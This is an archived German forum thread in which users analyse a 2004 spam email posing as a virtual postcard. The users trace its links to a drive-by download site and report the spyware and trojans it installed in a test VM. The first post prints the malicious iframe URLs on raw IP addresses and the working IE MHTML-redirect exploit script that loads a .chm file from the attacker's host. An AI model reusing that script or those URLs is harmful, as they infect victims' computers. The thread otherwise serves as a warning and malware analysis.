PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : localpart, You`ve received a postcard!



Gool
29.12.2004, 00:33
Received: from [144.133.235.182] (helo=compuserve.com)
by mx28.web.de with smtp (WEB.DE 4.103 #184)
ID: [ID filtered]
for xxx; Tue, 28 Dec 2004 xx:xx:xx +0100
Date: Tue, 28 Dec 2004 xx:xx:xx +0000
From: parkerm [at] coneharvesters.com
Subject: Blueslayah, You`ve received a postcard!
To: Blueslayah <xxx>
References: <2IB9I09J6F8JG421 [at] web.de>
In-Reply-To: <2IB9I09J6F8JG421 [at] web.de>
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: parkerm [at] coneharvesters.com

You have just received a virtual postcard from Aunt Edna!
You can pick up your postcard at the following web address:
h11p://www.postcards.org/?91-dodge-treads-aunt
If you can`t click on the web address above, you can also
visit 1001 Postcards at h11p://www.postcards.org/postcards/
and enter your pickup code, which is: 91-dodge-treads-aunt
(Your postcard will be available for 60 days.)
We hope you enjoy your postcard, and if you do,
please take a moment to send a few yourself!
Regards,
1001 Postcards
h11p://www.postcards.org/postcards/
P.S. If you`re happy with our service, let us know by
making a donation to help us pay our server hosting costs!
Please visit our donation page at Amazon.com!
h11p://www.amazon.com/paypage/PHVNBUIYDIUYD98QH
------------------------------------------------
Introducing the 1001 Postcards weekly newsletter!
Click here to subscribe for free to `Greetings from Marty & Alice`:
h11p://browse.postcards.org/go/postcards...cribe&email=xxx (h11p://browse.postcards.org/go/postcards/newsletter?action=subscribe&email=xxx)
------------------------------------------------
sender-ip: 55.97.53.71

Die Links in der E-Mail führen tatsächlich alle zu h11p://4.40.128.96:8180/008/ - mal wieder geschickt per HTML-Mail hinter harmlosen Links verborgen.
Der Exploit: Norton meldet mir "MHTMLRedir.Exploit"
Beim Aufruf der Seite wird folgendes in iframes geladen:
h11p://4.40.128.96:8180/007/index1.html
h11p://213.159.117.133/dl/adv50.php
h11p://213.159.117.133/dl/adv152.php
h11p://209.8.20.130/dl/adv230.php
h11p://206.161.125.149/in.php?wm=1268
Was genau dann passiert, weiß ich nicht. wird aber vermutlich dasselbe wie hier (http://www.heise.de/security/artikel/49687) beschrieben sein.
Der erste Link führt folgenden Befehl aus:
<textarea id="cxw" style="display:none;"><object data="${PR}" type="text/x-scriptlet" style="display:none;"></object></textarea>
<script language="javascript">
document.write(cxw.value.replace(/${PR}/g,`ms-its:mhtml:file://c:\nosuch.mht!http://4.40.128.96:8180/007/start.chm::/start.html`));
</script>
Die beiden folgenden Links nutzen den Exploit aus - da mein Virenscanner glücklicherweise dazwischenschreitet, weiß ich nicht, was da passiert - hat jemand ein ungesichertes Windows als vmware, um das mal zu testen?
Bei den letzten beiden Seiten wird mir nur ein 404-Fehler angezeigt.
Nachtrag: gibt es eine kostenlose vmware für Windows? Ansonsten müsste ich sparen, mir ne neue HD zulegen und mir Linux drauf packen - da ist doch eine vmware dabei, um Windows unter Linux laufen zu lassen, oder?
--
Fuck the Spammer: http://spam.blueslayah.de

Fidul
29.12.2004, 16:58
Probiere mal wine unter Knoppix.
--
Wir kriegen euch alle!

Gool
02.01.2005, 18:09
Jetzt müsste ich nur noch rausfinden, wie ich eine Windowsinstallation unter Knoppix vornehme, um eine Test-Windowsumgebung hinzubekommen. Ich denke, dann würde ich auch meinen Wireless-USB-Adapter zum Laufen kriegen...
--
Fuck the Spammer: http://spam.blueslayah.de

Gool
31.01.2005, 20:13
Diese Links sollten tatsächlich NICHT angeklickt werden, wenn man nicht geschützt ist. Ich habe einen virtuellen PC mit Windows 2000 eingerichtet, keine Service-Packs installiert, keinen Virenscanner, keine Firewall. Nachdem ich einen der Links angeklickt hatte, wurden etliche Programme installiert und das System quasi unbrauchbar gemacht. Dabei waren Versionen von CWS und andere Spyware, die nicht mal eine aktuelle Anti-Spyware-Software erkannte. Ich habe über eine Stunde benötigt, um Windows wieder richtig zum Laufen zu bekommen. Fraglich ist nur, was jetzt noch an Überresten auf dem PC zu finden ist. Den Großteil der Dateien musste ich per Hand entfernen. Ich analysiere jetzt noch, was noch vorhanden ist.
--
Fuck the Spammer: http://spam.blueslayah.de

Goofy
31.01.2005, 20:32
Es hatte doch geheissen, Gaven Stubberfield (das ist derjenige, der für CWS verantwortlich ist) will aufhören. Davon scheint nicht die Rede zu sein. CWS gibt es in ständig neuen Varianten. Wahrscheinlich ist das eine neue, wenn die Anti-Spy-Software es nicht erkennt.
Goofy

Gool
31.01.2005, 20:56
Ich vergaß zu erwähnen, dass ca. 5 Minuten, nachdem die Spyware komplett den PC befallen hatte, darüber eine Masse an Mails, die auf meinem richtigen PC allerdings geblockt wurden, versendet werden sollten. Mir blieb nichts anderes übrig, als die Internetverbindung zu trennen, damit das Versenden gestoppt werden konnte.
--
Fuck the Spammer: http://spam.blueslayah.de

Goofy
31.01.2005, 21:11
Scheint ja wirklich eine illustre Kombination zu sein. Vielleicht solltest Du die Links oben noch etwas entschärfen? Am Ende klickt tatsächlich noch so`n Paddel da drauf, mit ungesichertem Win/IE.
Hast Du mal entsprechende Abuse-mails geschrieben? Zumindest die Postcard.org (64.151.106.92) wäre in den Staaten erreichbar (ServePath, LLC).
Goofy

Gool
31.01.2005, 21:43
Entschärft sind sie ja schon in soweit, als dass, wenn man drauf klickt, die Seiten nicht aufgerufen werden (h11p stat http). Für alles weitere ist ja ein Benutzereingriff erforderlich und jeder ist für sein Handeln selbst verantwortlich, hat also auch die Konsequenzen zu tragen. Und ausführlich gewarnt wurde hier ja.
--
Fuck the Spammer: http://spam.blueslayah.de

Goofy
31.01.2005, 21:56
Ah, du hast recht. Das mit dem h11p hatte ich übersehen.
Hier sieht man im übrigen auch die Verwundbarkeit des Internet Explorers. Es wird z.B. über den Port 8180 verbunden. Firefox unterbindet derartige Versuche, der IE lässt es ungefragt zu. Dazu kommt noch Active-X, was auch mit dem XP-Service-Pack 2 ein Sicherheitsrisiko bleibt. Und der IFRAME-Exploit ist m.W. auch ein spezielles IE-Problem.
Goofy

Gool
31.01.2005, 22:22
Gefunden habe ich mit Stinger den W32/Sdbot.worm.gen.t (alias W32/Sdbot-TA alias Backdoor.Win32.IRCBot.j - http://www.sophos.de/virusinfo/analyses/w32sdbotta.html). Ein weiterer Virenscanner wird gerade noch installiert, danach werde ich noch AdAware und MS AntiSpy draufpacken. Mal sehen, was dann Sache ist.
[Nachtrag]
Das kann einem doch richtig Angst machen. F-Secure hat folgende Infektionen festgestellt:
Trojan.Win32.Favadd.c
Trojan.Win32.Qhost.k
Trojan.Win32.StartPage.pu
Trojan-Clicker.Win32.Promo.a
Trojan-Downloader.Win32.Delf.dg
Trojan-Downloader.Win32.Harnig.al
Trojan-Downloader.Win32.Small.agy
Trojan-Proxy.Win32.Agent.dn
Trojan-Spy.Win32.Banker.jj
Außerdem waren da noch eine Reihe nicht eindeutig identifizierbarer Dateien, die ich manuell gelöscht habe.
Als vertrauenswürdige Seiten wurden im IE folgende Seiten eingetragen:
flingstone.com
searchbarcash.com
searchmiracle.com
ysbweb.com
clickspring.net
mt-download.com
my-internet.info
blazefind.com
slotch.com
xxxtoolbar.com
skoobidoo.com
windupdates.com
Ich habe mal die Log-Dateien der Programme online gestellt:
http://www.blueslayah.de/public/Checks.050131-1952.txt
http://www.blueslayah.de/public/Checks.050131-2005.txt
http://www.blueslayah.de/public/f-secure-bericht.htm
http://www.blueslayah.de/public/aaw-log.TXT
http://www.blueslayah.de/public/msas-log.txt

--
Fuck the Spammer: http://spam.blueslayah.de